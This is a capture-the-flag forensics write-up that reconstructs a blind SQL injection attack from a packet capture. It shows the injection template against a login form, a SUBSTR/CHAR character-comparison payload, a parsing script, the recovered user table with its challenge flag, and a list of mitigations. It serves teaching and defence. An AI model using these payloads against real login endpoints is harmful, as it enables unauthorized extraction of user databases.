Forensics
Medium
180 points

Leak

Recuite 2025 - HCMUS
6 tháng 10, 2025
PCAP
SQL Injection
Blind SQLi
Database Leak
Recuite 2025 - HCMUS
Forensics

Leak - Writeup

Challenge Information

  • Category: Forensics
  • Files: capture.pcap (6.5MB)
  • Hint: "Hacker leaked my website database. Recover what was leaked!"

Analysis

Attack Vector

HTTP POST requests to /login contain blind SQL injection payloads targeting a SQLite database.

userid=123" OR [SQL_INJECTION_PAYLOAD]-- &userpassword=123

Injection Technique

Binary search using SUBSTR() and comparing with CHAR():

SUBSTR((SELECT CAST(userid AS TEXT) FROM users LIMIT 0,1), 1, 1) != CHAR(97)

The statement checks if the first character of userid in the first row is NOT 'a' (CHAR(97)).

Extraction Process

The attacker sequentially extracts:

  1. Table schema from sqlite_master
  2. Row count in users table
  3. Extract each character of userid and userpassword
  4. Multiple rows are extracted using LIMIT (LIMIT 0,1; LIMIT 1,1; LIMIT 2,1; ...)

Decoding Leaked Data

Python script used to analyze SQL injection queries in pcap:

import subprocess, re, urllib.parse

result = subprocess.run(['tcpdump', '-r', 'capture.pcap', '-A'], 
                       capture_output=True, text=True)

# Extract SQL patterns
pattern = r'userid=(.+?)&userpassword'
leaked_data = {}

for line in result.stdout.split('\n'):
    match = re.search(pattern, line)
    if match:
        payload = urllib.parse.unquote(match.group(1))
        # Parse CHAR() values where != comparison used
        parse_successful_matches(payload)

(Note: parse_successful_matches(payload) is where you add specific parsing logic — e.g. extracting CHAR(n) expressions and logging successful comparisons to reconstruct characters.)

Leaked Database

RowUser IDPassword
0adminguest
1aliceBPCTF{w4it_wh4t!!1_1_h4v3_b33n_3xf1ltr4t3d_XD}
2bobalice123
3charliebob123
4guestcharlie123

Flag

BPCTF{w4it_wh4t!!1_1_h4v3_b33n_3xf1ltr4t3d_XD}

Key Takeaways

  1. Blind SQLi Detection: Queries checking character-by-character are used systematically.
  2. PCAP Analysis: Attack is hidden within normal-looking HTTP POSTs.
  3. URL Decoding: Payloads are URL encoded — need decoding before analysis.
  4. Pattern Recognition: Character comparison using CHAR() is used for binary search.
  5. Data Reconstruction: Reconstruct data based on successful/failed comparisons.

Mitigation

  • Use parameterized queries / prepared statements.
  • Apply rate limiting to login endpoints.
  • Configure WAF rules to block suspicious SQL patterns.
  • Monitor logs to detect unusual SQL patterns.
  • Apply principle of least privilege for database accounts.
180
Points
Medium
Difficulty
Forensics
Category

More Forensics Challenges

Mouse Cap

Medium
120 pts

Painted

Hard
500 pts

Cropped

Medium
250 pts